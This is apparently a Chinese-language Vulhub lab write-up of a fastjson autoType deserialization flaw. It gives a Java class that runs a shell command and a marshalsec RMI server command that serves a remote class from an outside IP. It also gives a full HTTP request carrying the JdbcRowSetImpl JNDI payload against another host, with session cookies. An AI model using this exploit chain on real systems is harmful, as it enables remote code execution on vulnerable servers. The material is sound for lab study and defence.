漏洞环境均基于Vulhub
原因
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
参考资料:
复现
因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。
首先编译并上传命令执行代码,在服务器上启动
python3 -m http.server 6666
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
编译
然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:
编译工具命令
mvn clean package -DskipTests
执行命令,使用marshalsec-0.0.3-SNAPSHOT-all.jar起一个RMI服务器,监听9999端口,并制定加载远程类 TouchFile.class
sudo java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://216.127.164.238/#TouchFile" 7777
* Opening JRMP listener on 7777
修改包
POST / HTTP/1.1
Host: 101.43.191.94:8090
Cookie: Drupal.toolbar.collapsed=0; SESS22dffecb4ee16b176dfaba7e79921e1b=RCqrP2wGfPJ8b-NiDZHVawEzHYRDvdePidTFKGTkjZ4; SESS774a3e35a05f5f3c2b895b1876c81591=Ip_NOvE5I5f1R-0NJ5dGDzQfshBlHc0HayNlRTBEoI0; ECS[visit_times]=3; PHPSESSID=9e592edb435245ffea196dc34a2a9218
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 169
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://216.127.164.238:7777/TouchFile",
"autoCommit":true
}
}